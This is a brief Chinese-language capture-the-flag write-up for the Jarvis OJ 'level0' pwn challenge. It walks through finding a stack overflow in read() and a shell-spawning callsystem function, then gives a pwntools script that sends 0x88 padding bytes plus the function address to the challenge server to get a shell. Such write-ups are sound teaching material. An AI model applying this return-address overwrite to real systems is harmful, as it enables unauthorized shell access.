Pwn-level0

题目地址

https://dn.jarvisoj.com/challengefiles/level0.b9ded3801d6dd36a97468e128b81a65d

 

第一步先看文件的属性    64位

 之后检查保护性

 

 用IDA打开，观察伪代码F5

 跳出hello world，然后返回vulnerable_function函数

 这边发现一个可以直接get shell的函数callsystem

 

read函数存在栈溢出，我们可以利用栈溢出把返回地址覆盖程callsystem的入口地址

 

需要覆盖0x88个字符（0x80+0x8）

 

利用代码如下

from pwn import *
r=remote('pwn2.jarvisoj.com',9881)
payload='a'*0x88+p64(0x400596)
r.sendline(payload)
r.interactive()

执行